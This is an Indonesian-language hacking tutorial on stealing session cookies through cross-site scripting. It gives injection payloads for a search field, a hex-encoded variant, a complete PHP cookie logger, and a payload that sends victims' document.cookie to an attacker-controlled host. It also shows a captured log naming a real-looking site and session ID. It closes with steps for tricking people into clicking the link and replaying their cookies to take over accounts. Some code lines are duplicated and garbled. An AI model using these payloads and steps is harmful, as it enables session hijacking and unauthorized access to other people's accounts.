Mencuri cookie dengan methode XSS referansi

chmood

Disini saya menjelaskan tentang code dari inject menggunakan XSS , karena mungkin teman-teman sudah tahu apa yang di maksud dengan XSS
Langsung ke code ya ^_^ . ya mungkin atau katakan lah sebuah website tersebut memiliki pencarian sebagai berikut :

<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr> 


Untuk melakukan Injeksi coba lihat perhatikan dahulu tanda kutip pada code di atas . Apa yang harus di lakukan pada kode di atas ?
Kita mesti menutup / mengakhiri value tersebut sebelum kita melaksanakan injeksi ^_^ .


"><script>alert("test")</script> 


Nah Lanjut ya , kode di atas adalah untuk dapat menginject web yang akan di eksekusi,tapi ingat harus menutup nya dengan tanda kutip ^_^ .
Nah sekarang perlu di ketahui bahwa inject tersebut bukan ke dalam web server tersebut atau dalam istilah nya bukan web yang telah terpasang sebuah shell.
karena XSS adalah halaman di browser yang kita inject setelah kita menambahkan code inject tersebut,
sebuah contoh kita menginject dengan XSS kita tidak masuk dalam web server tersebut dan kita bisa mendeface nya.
Lanjut kita ke Contoh :



http://www.site.com/search.php?q="><script>alert("test")</script>

Nah Script di atas bisa juga kita manipulasi melalui hex query, berarti kita ke ascii hex ^_^
Link nya bisa di sini : http://www.easycalculation.com/ascii-hex.php
Setelah di kode ascii script code terdebut menjadi seperti di bawah ini ^_^


http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e
Penjelasan di atas adalah injeksi menggunakan XSS yang biasa atau sering di pake oleh attacker ,

Nah sebelum kita lanjut tentang Mencuri Cookie Dengan Methode XSS ada kalanya kita Minum air dahulu sambil Makan Roti ^_^

Mencuri Cookie Dengan Methode XSS

Nah Setelah kelar ngopi lanjut lagi , setelah penjelasan di atas kita tahu apa itu / menginject dengan methode XSS,
kalau belum paham ya berarti sama kaya saya ^_^.Yuk lanjut sekarang jika kita ingin mencuri cokie dari web tersebut bagaimana caranya ?
Cara yang termudah kita lakukan adalah 3 langkah yaitu : wudhu , shalat dan zikir eh salah ding bukan itu ,
1. server web kita / shell yang udah tertanam
2. Script Cokie ( ini adalah untuk melakukan inject )
3. log file

Langkah yang di lakukan adalah teman-teman harus membuat dua file yaitu log.txt dan scriptcokie.php .
File log.txt biarkan kosong tidak masalah ^_^ , nah klo file yang scriptcokie.php harus di isi dengan script / code di bawah ini :


<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>



pasti teman-teman bertanya buat apa script di atas ?
script tersebut adalah untuk mencatat setiap pengunjung yang mengunjungi web tersebut / web yang akan di inject .
Setelah kita persiapkan dua file tersebut kita upload wi web server kita / shell hasil inject ^_^ ,

Nah sekarang kita mencari web yang rentan terhadap serangan XSS untuk dapat bisa mengakses script tersebut untuk memodifikasi kan nya bisa lihat contoh di bawah ini :

"><script language= "JavaScript">document.location="http://yoursite.com/scriptcokie.php?cookie=" + document.cookie;document.location="http://www.webinject.com"</script> 



Perhatikan Script di atas bahwa injeksi ini hanya akan bekerja jika teman-teman tidak memodifikasi sumber halaman di ujung web server,
Nah meskipun ini merupakan solusi / halangan , kita bisa menyelesaikan maslah tersebut dengan cara menggunakan script inject tersebut.


logData(); logData ();
?> ?>



Seperti ini contoh nya :


logData(); logData ();

echo '<b>Page Under Construction</b>' echo '<b> Page Under Construction </ b>'
?> ?> 


Sekarang coba kita lihat file log.txt yang tadi nya kosong akan muncul seperti di bawah ini :


IP: 114.141.51.12 | PORT: 3128 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php |

DATE: Friday 24st 2010f Desember 2010 09:06:02 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373

Itu adalah sebaian contoh , masih ada sesuatu yang lain ^_^ selain PHPSESSID. tapi contoh nya mungkin sudah mantap alias joss.
Nah sebelum berpisah ingat cara ngedit cokies nya yo buka firebug nya dan menambahkan / memodifikasi ( koyo motor wae yo ^_^ ) semua bidang cokie agar sesuai dengan file log tersebut ^_^.
Web / server yang telah kita inject mungkin berfikir kita tidak bisa masuk / melihat isi di dalam nya.
Nah dengan cara ini kita bisa login ke acount atau yang lain nya tanpa perlu mengetahui user dan password nya.

Sedikit Tambahan ^_^ :
1. Test web yang akan kita inject apakah rentan terhadapa serangan XSS
2. Setelah mendapatkan web yang rentan kita upload dua file tersebut ke web kita / shell hasil inject.
3. Masukan Injeksi melalui URL web tersebut atau kalau ada dalam kotak teks
4. Ambil link atau URL dari halaman dengan permintaan pencarian dieksploitasi (jika injeksi tidak tersimpan di server salin halaman).
5. Mencari atau sedikit soceng ke pada orang untuk mengklik link tersebut
6. Periksa file log.txt nya
7. Ubah cookie nya sendiri untuk cocok dengan hasil tangkapan dan refresh halaman.
8. Periksa apakah anda maho atau bukan.

Sekian dari saya semoga bisa di mengerti ^_^ , Jika kurang di mengerti maklum saya juga masih belajar dan tidak pintar merangkai kata-kata ^_^



Wassalamu'alaikum


Thaks : TI.Sn1pe7
Category
Komentar